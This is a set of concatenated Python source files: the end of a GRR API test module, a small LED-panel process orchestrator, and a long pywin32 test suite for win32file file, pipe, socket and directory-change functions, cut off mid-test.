def testCollect(self):
operation = self.api.Client(
client_id=self.client_id).File("fs/os/c/Downloads/a.txt").Collect()
self.assertTrue(operation.operation_id)
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def testCollectWaitUntilDone(self):
f = self.api.Client(
client_id=self.client_id).File("fs/os/c/Downloads/a.txt")
with flow_test_lib.TestWorker():
operation = f.Collect()
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def ProcessOperation():
time.sleep(1)
flow_test_lib.FinishAllFlowsOnClient(self.client_id)
threading.Thread(target=ProcessOperation).start()
result_f = operation.WaitUntilDone().target_file
self.assertEqual(f.path, result_f.path)
self.assertEqual(operation.GetState(), operation.STATE_FINISHED)
def testFileFinderIndicatesCollectedSizeAfterCollection(self):
client_ref = self.api.Client(client_id=self.client_id)
# TODO(user): for symlink-related test scenarions, this should require
# follow_links to be True. However, unlike the ClientFileFinder test
# below, this one doesn't care about this setting. Fix the
# FileFinder/ClientFileFinder behavior to match each other.
args = rdf_file_finder.FileFinderArgs(
paths=[os.path.join(self.base_path, "numbers.txt")],
action=rdf_file_finder.FileFinderAction.Download()).AsPrimitiveProto()
client_ref.CreateFlow(name=file_finder.FileFinder.__name__, args=args)
flow_test_lib.FinishAllFlowsOnClient(
self.client_id, client_mock=action_mocks.FileFinderClientMock())
f = client_ref.File("fs/os" +
os.path.join(self.base_path, "numbers.txt")).Get()
self.assertNotEqual(f.data.hash.sha256, b"")
self.assertGreater(f.data.hash.num_bytes, 0)
self.assertGreater(f.data.last_collected, 0)
self.assertGreater(f.data.last_collected_size, 0)
def testClientFileFinderIndicatesCollectedSizeAfterCollection(self):
client_ref = self.api.Client(client_id=self.client_id)
args = rdf_file_finder.FileFinderArgs(
paths=[os.path.join(self.base_path, "numbers.txt")],
action=rdf_file_finder.FileFinderAction.Download(),
follow_links=True).AsPrimitiveProto()
client_ref.CreateFlow(name=file_finder.ClientFileFinder.__name__, args=args)
flow_test_lib.FinishAllFlowsOnClient(
self.client_id, client_mock=action_mocks.ClientFileFinderClientMock())
f = client_ref.File("fs/os" +
os.path.join(self.base_path, "numbers.txt")).Get()
self.assertNotEqual(f.data.hash.sha256, b"")
self.assertGreater(f.data.hash.num_bytes, 0)
self.assertGreater(f.data.last_collected, 0)
self.assertGreater(f.data.last_collected_size, 0)
def testGetFileIndicatesCollectedSizeAfterCollection(self):
# Find the file with FileFinder stat action, so that we can reference it
# and trigger "Collect" operation on it.
client_ref = self.api.Client(client_id=self.client_id)
args = rdf_file_finder.FileFinderArgs(
paths=[os.path.join(self.base_path, "numbers.txt")],
action=rdf_file_finder.FileFinderAction.Stat()).AsPrimitiveProto()
client_ref.CreateFlow(name=file_finder.FileFinder.__name__, args=args)
client_mock = action_mocks.FileFinderClientMock()
flow_test_lib.FinishAllFlowsOnClient(
self.client_id, client_mock=client_mock)
f = client_ref.File("fs/os" + os.path.join(self.base_path, "numbers.txt"))
with flow_test_lib.TestWorker():
operation = f.Collect()
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
flow_test_lib.FinishAllFlowsOnClient(
self.client_id, client_mock=client_mock)
self.assertEqual(operation.GetState(), operation.STATE_FINISHED)
f = f.Get()
self.assertNotEqual(f.data.hash.sha256, b"")
self.assertGreater(f.data.hash.num_bytes, 0)
self.assertGreater(f.data.last_collected, 0)
self.assertGreater(f.data.last_collected_size, 0)
def testArtifactCollectorIndicatesCollectedSizeAfterCollection(self):
registry_stub = artifact_registry.ArtifactRegistry()
source = rdf_artifacts.ArtifactSource(
type=rdf_artifacts.ArtifactSource.SourceType.FILE,
attributes={
"paths": [os.path.join(self.base_path, "numbers.txt")],
})
artifact = rdf_artifacts.Artifact(
name="FakeArtifact", sources=[source], doc="fake artifact doc")
registry_stub.RegisterArtifact(artifact)
client_ref = self.api.Client(client_id=self.client_id)
with mock.patch.object(artifact_registry, "REGISTRY", registry_stub):
args = rdf_artifacts.ArtifactCollectorFlowArgs(
artifact_list=["FakeArtifact"]).AsPrimitiveProto()
client_ref.CreateFlow(
name=collectors.ArtifactCollectorFlow.__name__, args=args)
client_mock = action_mocks.FileFinderClientMock()
flow_test_lib.FinishAllFlowsOnClient(
self.client_id, client_mock=client_mock)
f = client_ref.File("fs/os" +
os.path.join(self.base_path, "numbers.txt")).Get()
self.assertNotEqual(f.data.hash.sha256, b"")
self.assertGreater(f.data.hash.num_bytes, 0)
self.assertGreater(f.data.last_collected, 0)
self.assertGreater(f.data.last_collected_size, 0)
def testGetTimeline(self):
timeline = self.api.Client(
client_id=self.client_id).File("fs/os").GetTimeline()
self.assertTrue(timeline)
for item in timeline:
self.assertIsInstance(item, vfs_pb2.ApiVfsTimelineItem)
def testGetTimelineAsCsv(self):
out = io.BytesIO()
self.api.Client(client_id=self.client_id).File(
"fs/os").GetTimelineAsCsv().WriteToStream(out)
self.assertTrue(out.getvalue())
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
app.run(main)
|
shobaleader.py
|
from multiprocessing import Process
from lib.panel import Panel
class Shobaleader:
"""Orchestrator of the whole thing."""
def __init__(self):
"""Construct."""
self.panel = Panel()
self.performer_class = None
self.args = None
self.process = None
def render(self):
"""Put the frames on the panel."""
performer = self.performer_class(**self.args)
for frame in performer.perform():
self.panel.display(frame)
def run(self, performer_class, **kwargs):
"""Control the process."""
if performer_class == self.performer_class and kwargs == self.args:
return # nocov
self.performer_class = performer_class
self.args = kwargs
self.stop()
self.process = Process(target=self.render)
self.process.start()
def stop(self):
"""Stop the running process."""
if self.process:
self.process.terminate()
|
test_win32file.py
|
import unittest
from pywin32_testutil import str2bytes, TestSkipped, testmain
import win32api, win32file, win32pipe, pywintypes, winerror, win32event
import win32con, ntsecuritycon
import sys
import os
import tempfile
import threading
import time
import shutil
import socket
import datetime
import random
import win32timezone
try:
set
except NameError:
from sets import Set as set
class TestReadBuffer(unittest.TestCase):
def testLen(self):
buffer = win32file.AllocateReadBuffer(1)
self.failUnlessEqual(len(buffer), 1)
def testSimpleIndex(self):
buffer = win32file.AllocateReadBuffer(1)
buffer[0] = 0xFF
self.assertEqual(buffer[0], 0xFF)
def testSimpleSlice(self):
buffer = win32file.AllocateReadBuffer(2)
val = str2bytes("\0\0")
buffer[:2] = val
self.failUnlessEqual(buffer[0:2], val)
class TestSimpleOps(unittest.TestCase):
def testSimpleFiles(self):
fd, filename = tempfile.mkstemp()
os.close(fd)
os.unlink(filename)
handle = win32file.CreateFile(
filename, win32file.GENERIC_WRITE, 0, None, win32con.CREATE_NEW, 0, None
)
test_data = str2bytes("Hello\0there")
try:
win32file.WriteFile(handle, test_data)
handle.Close()
# Try and open for read
handle = win32file.CreateFile(
filename,
win32file.GENERIC_READ,
0,
None,
win32con.OPEN_EXISTING,
0,
None,
)
rc, data = win32file.ReadFile(handle, 1024)
self.assertEquals(data, test_data)
finally:
handle.Close()
try:
os.unlink(filename)
except os.error:
pass
# A simple test using normal read/write operations.
def testMoreFiles(self):
# Create a file in the %TEMP% directory.
testName = os.path.join(win32api.GetTempPath(), "win32filetest.dat")
desiredAccess = win32file.GENERIC_READ | win32file.GENERIC_WRITE
# Set a flag to delete the file automatically when it is closed.
fileFlags = win32file.FILE_FLAG_DELETE_ON_CLOSE
h = win32file.CreateFile(
testName,
desiredAccess,
win32file.FILE_SHARE_READ,
None,
win32file.CREATE_ALWAYS,
fileFlags,
0,
)
# Write a known number of bytes to the file.
data = str2bytes("z") * 1025
win32file.WriteFile(h, data)
self.failUnless(
win32file.GetFileSize(h) == len(data),
"WARNING: Written file does not have the same size as the length of the data in it!",
)
# Ensure we can read the data back.
win32file.SetFilePointer(h, 0, win32file.FILE_BEGIN)
hr, read_data = win32file.ReadFile(
h, len(data) + 10
) # + 10 to get anything extra
self.failUnless(hr == 0, "Readfile returned %d" % hr)
self.failUnless(read_data == data, "Read data is not what we wrote!")
# Now truncate the file at 1/2 its existing size.
newSize = len(data) // 2
win32file.SetFilePointer(h, newSize, win32file.FILE_BEGIN)
win32file.SetEndOfFile(h)
self.failUnlessEqual(win32file.GetFileSize(h), newSize)
# GetFileAttributesEx/GetFileAttributesExW tests.
self.failUnlessEqual(
win32file.GetFileAttributesEx(testName),
win32file.GetFileAttributesExW(testName),
)
attr, ct, at, wt, size = win32file.GetFileAttributesEx(testName)
self.failUnless(
size == newSize,
"Expected GetFileAttributesEx to return the same size as GetFileSize()",
)
self.failUnless(
attr == win32file.GetFileAttributes(testName),
"Expected GetFileAttributesEx to return the same attributes as GetFileAttributes",
)
h = None # Close the file by removing the last reference to the handle!
self.failUnless(
not os.path.isfile(testName), "After closing the file, it still exists!"
)
def testFilePointer(self):
# via [ 979270 ] SetFilePointer fails with negative offset
# Create a file in the %TEMP% directory.
filename = os.path.join(win32api.GetTempPath(), "win32filetest.dat")
f = win32file.CreateFile(
filename,
win32file.GENERIC_READ | win32file.GENERIC_WRITE,
0,
None,
win32file.CREATE_ALWAYS,
win32file.FILE_ATTRIBUTE_NORMAL,
0,
)
try:
# Write some data
data = str2bytes("Some data")
(res, written) = win32file.WriteFile(f, data)
self.failIf(res)
self.assertEqual(written, len(data))
# Move at the beginning and read the data
win32file.SetFilePointer(f, 0, win32file.FILE_BEGIN)
(res, s) = win32file.ReadFile(f, len(data))
self.failIf(res)
self.assertEqual(s, data)
# Move at the end and read the data
win32file.SetFilePointer(f, -len(data), win32file.FILE_END)
(res, s) = win32file.ReadFile(f, len(data))
self.failIf(res)
self.failUnlessEqual(s, data)
finally:
f.Close()
os.unlink(filename)
def testFileTimesTimezones(self):
filename = tempfile.mktemp("-testFileTimes")
# now() is always returning a timestamp with microseconds but the
# file APIs all have zero microseconds, so some comparisons fail.
now_utc = win32timezone.utcnow().replace(microsecond=0)
now_local = now_utc.astimezone(win32timezone.TimeZoneInfo.local())
h = win32file.CreateFile(
filename,
win32file.GENERIC_READ | win32file.GENERIC_WRITE,
0,
None,
win32file.CREATE_ALWAYS,
0,
0,
)
try:
win32file.SetFileTime(h, now_utc, now_utc, now_utc)
ct, at, wt = win32file.GetFileTime(h)
self.failUnlessEqual(now_local, ct)
self.failUnlessEqual(now_local, at)
self.failUnlessEqual(now_local, wt)
# and the reverse - set local, check against utc
win32file.SetFileTime(h, now_local, now_local, now_local)
ct, at, wt = win32file.GetFileTime(h)
self.failUnlessEqual(now_utc, ct)
self.failUnlessEqual(now_utc, at)
self.failUnlessEqual(now_utc, wt)
finally:
h.close()
os.unlink(filename)
def testFileTimes(self):
from win32timezone import TimeZoneInfo
# now() is always returning a timestamp with microseconds but the
# file APIs all have zero microseconds, so some comparisons fail.
now = datetime.datetime.now(tz=TimeZoneInfo.utc()).replace(microsecond=0)
nowish = now + datetime.timedelta(seconds=1)
later = now + datetime.timedelta(seconds=120)
filename = tempfile.mktemp("-testFileTimes")
# Windows docs the 'last time' isn't valid until the last write
# handle is closed - so create the file, then re-open it to check.
open(filename, "w").close()
f = win32file.CreateFile(
filename,
win32file.GENERIC_READ | win32file.GENERIC_WRITE,
0,
None,
win32con.OPEN_EXISTING,
0,
None,
)
try:
ct, at, wt = win32file.GetFileTime(f)
self.failUnless(
ct >= now,
"File was created in the past - now=%s, created=%s" % (now, ct),
)
self.failUnless(now <= ct <= nowish, (now, ct))
self.failUnless(
wt >= now,
"File was written-to in the past now=%s, written=%s" % (now, wt),
)
self.failUnless(now <= wt <= nowish, (now, wt))
# Now set the times.
win32file.SetFileTime(f, later, later, later, UTCTimes=True)
# Get them back.
ct, at, wt = win32file.GetFileTime(f)
# XXX - the builtin PyTime type appears to be out by a dst offset.
# just ignore that type here...
self.failUnlessEqual(ct, later)
self.failUnlessEqual(at, later)
self.failUnlessEqual(wt, later)
finally:
f.Close()
os.unlink(filename)
class TestGetFileInfoByHandleEx(unittest.TestCase):
__handle = __filename = None
def setUp(self):
fd, self.__filename = tempfile.mkstemp()
os.close(fd)
def tearDown(self):
if self.__handle is not None:
self.__handle.Close()
if self.__filename is not None:
try:
os.unlink(self.__filename)
except OSError:
pass
self.__handle = self.__filename = None
def testFileBasicInfo(self):
attr = win32file.GetFileAttributes(self.__filename)
f = win32file.CreateFile(
self.__filename,
win32file.GENERIC_READ,
0,
None,
win32con.OPEN_EXISTING,
0,
None,
)
self.__handle = f
ct, at, wt = win32file.GetFileTime(f)
# bug #752: this throws ERROR_BAD_LENGTH (24) in x86 binaries of build 221
basic_info = win32file.GetFileInformationByHandleEx(f, win32file.FileBasicInfo)
self.assertEqual(ct, basic_info["CreationTime"])
self.assertEqual(at, basic_info["LastAccessTime"])
self.assertEqual(wt, basic_info["LastWriteTime"])
self.assertEqual(attr, basic_info["FileAttributes"])
class TestOverlapped(unittest.TestCase):
def testSimpleOverlapped(self):
# Create a file in the %TEMP% directory.
import win32event
testName = os.path.join(win32api.GetTempPath(), "win32filetest.dat")
desiredAccess = win32file.GENERIC_WRITE
overlapped = pywintypes.OVERLAPPED()
evt = win32event.CreateEvent(None, 0, 0, None)
overlapped.hEvent = evt
# Create the file and write shit-loads of data to it.
h = win32file.CreateFile(
testName, desiredAccess, 0, None, win32file.CREATE_ALWAYS, 0, 0
)
chunk_data = str2bytes("z") * 0x8000
num_loops = 512
expected_size = num_loops * len(chunk_data)
for i in range(num_loops):
win32file.WriteFile(h, chunk_data, overlapped)
win32event.WaitForSingleObject(overlapped.hEvent, win32event.INFINITE)
overlapped.Offset = overlapped.Offset + len(chunk_data)
h.Close()
# Now read the data back overlapped
overlapped = pywintypes.OVERLAPPED()
evt = win32event.CreateEvent(None, 0, 0, None)
overlapped.hEvent = evt
desiredAccess = win32file.GENERIC_READ
h = win32file.CreateFile(
testName, desiredAccess, 0, None, win32file.OPEN_EXISTING, 0, 0
)
buffer = win32file.AllocateReadBuffer(0xFFFF)
while 1:
try:
hr, data = win32file.ReadFile(h, buffer, overlapped)
win32event.WaitForSingleObject(overlapped.hEvent, win32event.INFINITE)
overlapped.Offset = overlapped.Offset + len(data)
if not data is buffer:
self.fail(
"Unexpected result from ReadFile - should be the same buffer we passed it"
)
except win32api.error:
break
h.Close()
def testCompletionPortsMultiple(self):
# Mainly checking that we can "associate" an existing handle. This
# failed in build 203.
ioport = win32file.CreateIoCompletionPort(
win32file.INVALID_HANDLE_VALUE, 0, 0, 0
)
socks = []
for PORT in range(9123, 9125):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("", PORT))
sock.listen(1)
socks.append(sock)
new = win32file.CreateIoCompletionPort(sock.fileno(), ioport, PORT, 0)
assert new is ioport
for s in socks:
s.close()
hv = int(ioport)
ioport = new = None
# The handle itself should be closed now (unless we leak references!)
# Check that.
try:
win32file.CloseHandle(hv)
raise RuntimeError("Expected close to fail!")
except win32file.error as details:
self.failUnlessEqual(details.winerror, winerror.ERROR_INVALID_HANDLE)
def testCompletionPortsQueued(self):
class Foo:
pass
io_req_port = win32file.CreateIoCompletionPort(-1, None, 0, 0)
overlapped = pywintypes.OVERLAPPED()
overlapped.object = Foo()
win32file.PostQueuedCompletionStatus(io_req_port, 0, 99, overlapped)
errCode, bytes, key, overlapped = win32file.GetQueuedCompletionStatus(
io_req_port, win32event.INFINITE
)
self.failUnlessEqual(errCode, 0)
self.failUnless(isinstance(overlapped.object, Foo))
def _IOCPServerThread(self, handle, port, drop_overlapped_reference):
overlapped = pywintypes.OVERLAPPED()
win32pipe.ConnectNamedPipe(handle, overlapped)
if drop_overlapped_reference:
# Be naughty - the overlapped object is now dead, but
# GetQueuedCompletionStatus will still find it. Our check of
# reference counting should catch that error.
overlapped = None
# even if we fail, be sure to close the handle; prevents hangs
# on Vista 64...
try:
self.failUnlessRaises(
RuntimeError, win32file.GetQueuedCompletionStatus, port, -1
)
finally:
handle.Close()
return
result = win32file.GetQueuedCompletionStatus(port, -1)
ol2 = result[-1]
self.failUnless(ol2 is overlapped)
data = win32file.ReadFile(handle, 512)[1]
win32file.WriteFile(handle, data)
def testCompletionPortsNonQueued(self, test_overlapped_death=0):
# In 204 we had a reference count bug when OVERLAPPED objects were
# associated with a completion port other than via
# PostQueuedCompletionStatus. This test is based on the reproduction
# reported with that bug.
# Create the pipe.
BUFSIZE = 512
pipe_name = r"\\.\pipe\pywin32_test_pipe"
handle = win32pipe.CreateNamedPipe(
pipe_name,
win32pipe.PIPE_ACCESS_DUPLEX | win32file.FILE_FLAG_OVERLAPPED,
win32pipe.PIPE_TYPE_MESSAGE
| win32pipe.PIPE_READMODE_MESSAGE
| win32pipe.PIPE_WAIT,
1,
BUFSIZE,
BUFSIZE,
win32pipe.NMPWAIT_WAIT_FOREVER,
None,
)
# Create an IOCP and associate it with the handle.
port = win32file.CreateIoCompletionPort(-1, 0, 0, 0)
win32file.CreateIoCompletionPort(handle, port, 1, 0)
t = threading.Thread(
target=self._IOCPServerThread, args=(handle, port, test_overlapped_death)
)
t.setDaemon(True) # avoid hanging entire test suite on failure.
t.start()
try:
time.sleep(0.1) # let thread do its thing.
try:
win32pipe.CallNamedPipe(
r"\\.\pipe\pywin32_test_pipe", str2bytes("Hello there"), BUFSIZE, 0
)
except win32pipe.error:
# Testing for overlapped death causes this
if not test_overlapped_death:
raise
finally:
if not test_overlapped_death:
handle.Close()
t.join(3)
self.failIf(t.is_alive(), "thread didn't finish")
def testCompletionPortsNonQueuedBadReference(self):
self.testCompletionPortsNonQueued(True)
def testHashable(self):
overlapped = pywintypes.OVERLAPPED()
d = {}
d[overlapped] = "hello"
self.failUnlessEqual(d[overlapped], "hello")
def testComparable(self):
overlapped = pywintypes.OVERLAPPED()
self.failUnlessEqual(overlapped, overlapped)
# ensure we explicitly test the operators.
self.failUnless(overlapped == overlapped)
self.failIf(overlapped != overlapped)
def testComparable2(self):
# 2 overlapped objects compare equal if their contents are the same.
overlapped1 = pywintypes.OVERLAPPED()
overlapped2 = pywintypes.OVERLAPPED()
self.failUnlessEqual(overlapped1, overlapped2)
# ensure we explicitly test the operators.
self.failUnless(overlapped1 == overlapped2)
self.failIf(overlapped1 != overlapped2)
# now change something in one of them - should no longer be equal.
overlapped1.hEvent = 1
self.failIfEqual(overlapped1, overlapped2)
# ensure we explicitly test the operators.
self.failIf(overlapped1 == overlapped2)
self.failUnless(overlapped1 != overlapped2)
class TestSocketExtensions(unittest.TestCase):
def acceptWorker(self, port, running_event, stopped_event):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(("", port))
listener.listen(200)
# create accept socket
accepter = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# An overlapped
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
# accept the connection.
# We used to allow strings etc to be passed here, and they would be
# modified! Obviously this is evil :)
buffer = " " * 1024 # EVIL - SHOULD NOT BE ALLOWED.
self.assertRaises(
TypeError, win32file.AcceptEx, listener, accepter, buffer, overlapped
)
# This is the correct way to allocate the buffer...
buffer = win32file.AllocateReadBuffer(1024)
rc = win32file.AcceptEx(listener, accepter, buffer, overlapped)
self.failUnlessEqual(rc, winerror.ERROR_IO_PENDING)
# Set the event to say we are all ready
running_event.set()
# and wait for the connection.
rc = win32event.WaitForSingleObject(overlapped.hEvent, 2000)
if rc == win32event.WAIT_TIMEOUT:
self.fail("timed out waiting for a connection")
nbytes = win32file.GetOverlappedResult(listener.fileno(), overlapped, False)
# fam, loc, rem = win32file.GetAcceptExSockaddrs(accepter, buffer)
accepter.send(buffer[:nbytes])
# NOT set in a finally - this means *successfully* stopped!
stopped_event.set()
def testAcceptEx(self):
port = 4680
running = threading.Event()
stopped = threading.Event()
t = threading.Thread(target=self.acceptWorker, args=(port, running, stopped))
t.start()
running.wait(2)
if not running.isSet():
self.fail("AcceptEx Worker thread failed to start")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", port))
win32file.WSASend(s, str2bytes("hello"), None)
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
# Like above - WSARecv used to allow strings as the receive buffer!!
buffer = " " * 10
self.assertRaises(TypeError, win32file.WSARecv, s, buffer, overlapped)
# This one should work :)
buffer = win32file.AllocateReadBuffer(10)
win32file.WSARecv(s, buffer, overlapped)
nbytes = win32file.GetOverlappedResult(s.fileno(), overlapped, True)
got = buffer[:nbytes]
self.failUnlessEqual(got, str2bytes("hello"))
# thread should have stopped
stopped.wait(2)
if not stopped.isSet():
self.fail("AcceptEx Worker thread failed to successfully stop")
class TestFindFiles(unittest.TestCase):
def testIter(self):
dir = os.path.join(os.getcwd(), "*")
files = win32file.FindFilesW(dir)
set1 = set()
set1.update(files)
set2 = set()
for file in win32file.FindFilesIterator(dir):
set2.add(file)
assert len(set2) > 5, "This directory has less than 5 files!?"
self.failUnlessEqual(set1, set2)
def testBadDir(self):
dir = os.path.join(os.getcwd(), "a dir that doesnt exist", "*")
self.assertRaises(win32file.error, win32file.FindFilesIterator, dir)
def testEmptySpec(self):
spec = os.path.join(os.getcwd(), "*.foo_bar")
num = 0
for i in win32file.FindFilesIterator(spec):
num += 1
self.failUnlessEqual(0, num)
def testEmptyDir(self):
test_path = os.path.join(win32api.GetTempPath(), "win32file_test_directory")
try:
# Note: previously used shutil.rmtree, but when looking for
# reference count leaks, that function showed leaks! os.rmdir
# doesn't have that problem.
os.rmdir(test_path)
except os.error:
pass
os.mkdir(test_path)
try:
num = 0
for i in win32file.FindFilesIterator(os.path.join(test_path, "*")):
num += 1
# Expecting "." and ".." only
self.failUnlessEqual(2, num)
finally:
os.rmdir(test_path)
class TestDirectoryChanges(unittest.TestCase):
num_test_dirs = 1
def setUp(self):
self.watcher_threads = []
self.watcher_thread_changes = []
self.dir_names = []
self.dir_handles = []
for i in range(self.num_test_dirs):
td = tempfile.mktemp("-test-directory-changes-%d" % i)
os.mkdir(td)
self.dir_names.append(td)
hdir = win32file.CreateFile(
td,
ntsecuritycon.FILE_LIST_DIRECTORY,
win32con.FILE_SHARE_READ,
None, # security desc
win32con.OPEN_EXISTING,
win32con.FILE_FLAG_BACKUP_SEMANTICS | win32con.FILE_FLAG_OVERLAPPED,
None,
)
self.dir_handles.append(hdir)
changes = []
t = threading.Thread(
target=self._watcherThreadOverlapped, args=(td, hdir, changes)
)
t.start()
self.watcher_threads.append(t)
self.watcher_thread_changes.append(changes)
def _watcherThread(self, dn, dh, changes):
# A synchronous version:
# XXX - not used - I was having a whole lot of problems trying to
# get this to work. Specifically:
# * ReadDirectoryChangesW without an OVERLAPPED blocks infinitely.
# * If another thread attempts to close the handle while
# ReadDirectoryChangesW is waiting on it, the ::CloseHandle() method
# blocks (which has nothing to do with the GIL - it is correctly
# managed)
# Which ends up with no way to kill the thread!
flags = win32con.FILE_NOTIFY_CHANGE_FILE_NAME
while 1:
try:
print("waiting", dh)
changes = win32file.ReadDirectoryChangesW(
dh, 8192, False, flags # sub-tree
)
print("got", changes)
except:
raise
changes.extend(changes)
def _watcherThreadOverlapped(self, dn, dh, changes):
flags = win32con.FILE_NOTIFY_CHANGE_FILE_NAME
buf = win32file.AllocateReadBuffer(8192)
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
while 1:
win32file.ReadDirectoryChangesW(
dh, buf, False, flags, overlapped # sub-tree
)
# Wait for our event, or for 5 seconds.
rc = win32event.WaitForSingleObject(overlapped.hEvent, 5000)
if rc == win32event.WAIT_OBJECT_0:
# got some data! Must use GetOverlappedResult to find out
# how much is valid! 0 generally means the handle has
# been closed. Blocking is OK here, as the event has
# already been set.
nbytes = win32file.GetOverlappedResult(dh, overlapped, True)
if nbytes:
bits = win32file.FILE_NOTIFY_INFORMATION(buf, nbytes)
changes.extend(bits)
else:
# This is "normal" exit - our 'tearDown' closes the
# handle.
# print "looks like dir handle was closed!"
return
else:
print("ERROR: Watcher thread timed-out!")
return # kill the thread!
def tearDown(self):
# be careful about raising errors at teardown!
for h in self.dir_handles:
# See comments in _watcherThread above - this appears to
# deadlock if a synchronous ReadDirectoryChangesW is waiting...
# (No such problems with an asynch ReadDirectoryChangesW)
h.Close()
for dn in self.dir_names:
try:
shutil.rmtree(dn)
except OSError:
print("FAILED to remove directory", dn)
for t in self.watcher_threads:
# closing dir handle should have killed threads!
t.join(5)
if t.is_alive():
print("FAILED to wait for thread termination")
def stablize(self):
time.sleep(0.5)
def testSimple(self):
self.stablize()
for dn in self.dir_names:
fn = os.path.join(dn, "test_file")
open(fn, "w").close()
self.stablize()
changes = self.watcher_thread_changes[0]
self.failUnlessEqual(changes, [(1, "test_file")])
def testSmall(self):
self.stablize()
for dn in self.dir_names:
fn = os.path.join(dn, "x")
open(fn, "w").close()
self.stablize()
changes = self.watcher_thread_changes[0]
self.failUnlessEqual(changes, [(1, "x")])
class TestEncrypt(unittest.TestCase):
def testEncrypt(self):
fname = tempfile.mktemp("win32file_test")
f = open(fname, "wb")
f.write(str2bytes("hello"))
f.close()
f = None
try:
try:
win32file.EncryptFile(fname)
except win32file.error as details:
if details.winerror != winerror.ERROR_ACCESS_DENIED:
raise
print("It appears this is not NTFS - cant encrypt/decrypt")
win32file.DecryptFile(fname)
finally:
if f is not None:
f.close()
os.unlink(fname)
class TestConnect(unittest.TestCase):
def connect_thread_runner(self, expect_payload, giveup_event):
# As Windows 2000 doesn't do ConnectEx, we need to use a non-blocking
# accept, as our test connection may never come. May as well use
# AcceptEx for this...
listener = socket.socket()
self.addr = ("localhost", random.randint(10000, 64000))
listener.bind(self.addr)
listener.listen(1)
# create accept socket
accepter = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# An overlapped
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
# accept the connection.
if expect_payload:
buf_size = 1024
else:
# when we don't expect data we must be careful to only pass the
# exact number of bytes for the endpoint data...
buf_size = win32file.CalculateSocketEndPointSize(listener)
buffer = win32file.AllocateReadBuffer(buf_size)
win32file.AcceptEx(listener, accepter, buffer, overlapped)
# wait for the connection or our test to fail.
events = giveup_event, overlapped.hEvent
rc = win32event.WaitForMultipleObjects(events, False, 2000)
if rc == win32event.WAIT_TIMEOUT:
self.fail("timed out waiting for a connection")
if rc == win32event.WAIT_OBJECT_0:
# Our main thread running the test failed and will never connect.
return
# must be a connection.
nbytes = win32file.GetOverlappedResult(listener.fileno(), overlapped, False)
if expect_payload:
self.request = buffer[:nbytes]
accepter.send(str2bytes("some expected response"))
def test_connect_with_payload(self):
giveup_event = win32event.CreateEvent(None, 0, 0, None)
t = threading.Thread(
target=self.connect_thread_runner, args=(True, giveup_event)
)
t.start()
time.sleep(0.1)
s2 = socket.socket()
ol = pywintypes.OVERLAPPED()
s2.bind(("0.0.0.0", 0)) # connectex requires the socket be bound beforehand
try:
win32file.ConnectEx(s2, self.addr, ol, str2bytes("some expected request"))
except win32file.error as exc:
win32event.SetEvent(giveup_event)
if exc.winerror == 10022: # WSAEINVAL
raise TestSkipped("ConnectEx is not available on this platform")
raise # some error error we don't expect.
# We occasionally see ERROR_CONNECTION_REFUSED in automation
try:
win32file.GetOverlappedResult(s2.fileno(), ol, 1)
except win32file.error as exc:
win32event.SetEvent(giveup_event)
if exc.winerror == winerror.ERROR_CONNECTION_REFUSED:
raise TestSkipped("Assuming ERROR_CONNECTION_REFUSED is transient")
raise
ol = pywintypes.OVERLAPPED()
buff = win32file.AllocateReadBuffer(1024)
win32file.WSARecv(s2, buff, ol, 0)
length = win32file.GetOverlappedResult(s2.fileno(), ol, 1)
self.response = buff[:length]
self.assertEqual(self.response, str2bytes("some expected response"))
self.assertEqual(self.request, str2bytes("some expected request"))
t.join(5)
self.failIf(t.is_alive(), "worker thread didn't terminate")
def test_connect_without_payload(self):
giveup_event = win32event.CreateEvent(None, 0, 0, None)
t = threading.Thread(
target=self.connect_thread_runner, args=(False, giveup_event)
)
t.start()
time.sleep(0.1)
s2 = socket.socket()
ol = pywintypes.OVERLAPPED()
s2.bind(("0.0.0.0", 0)) # connectex requires the socket be bound beforehand
try:
win32file.ConnectEx(s2, self.addr, ol)
except win32file.error as exc:
win32event.SetEvent(giveup_event)
if exc.winerror == 10022: # WSAEINVAL
raise TestSkipped("ConnectEx is not available on this platform")
raise # some error error we don't expect.
# We occasionally see ERROR_CONNECTION_REFUSED in automation
try:
win32file.GetOverlappedResult(s2.fileno(), ol, 1)
except win32file.error as exc:
win32event.SetEvent(giveup_event)
if exc.winerror == winerror.ERROR_CONNECTION_REFUSED:
raise TestSkipped("Assuming ERROR_CONNECTION_REFUSED is transient")
raise
ol = pywintypes.OVERLAPPED()
buff = win32file.AllocateReadBuffer(1024)
win32file.WSARecv(s2, buff, ol, 0)
length = win32file.GetOverlappedResult(s2.fileno(), ol, 1)
self.response = buff[:length]
self.assertEqual(self.response, str2bytes("some expected response"))
t.join(5)
self.failIf(t.is_alive(), "worker thread didn't terminate")
class TestTransmit(unittest.TestCase):
def test_transmit(self):
import binascii
bytes = os.urandom(1024 * 1024)
val = binascii.hexlify(bytes)
val_length = len(val)
f = tempfile.TemporaryFile()
f.write(val)
def runner():
s1 = socket.socket()
# binding fails occasionally on github CI with:
# OSError: [WinError 10013] An attempt was made to access a socket in a way forbidden by its access permissions
# which probably just means the random port is already in use, so
# let that happen a few times.
for i in range(5):
self.addr = ("localhost", random.randint(10000, 64000))
try:
s1.bind(self.addr)
break
except os.error as exc:
if exc.winerror != 10013:
raise
print("Failed to use port", self.addr, "trying another random one")
else:
raise RuntimeError("Failed to find an available port to bind to.")
s1.listen(1)
cli, addr = s1.accept()
buf = 1
self.request = []
while buf:
buf = cli.recv(1024 * 100)
self.request.append(buf)
th = threading.Thread(target=runner)
th.start()
time.sleep(0.5)
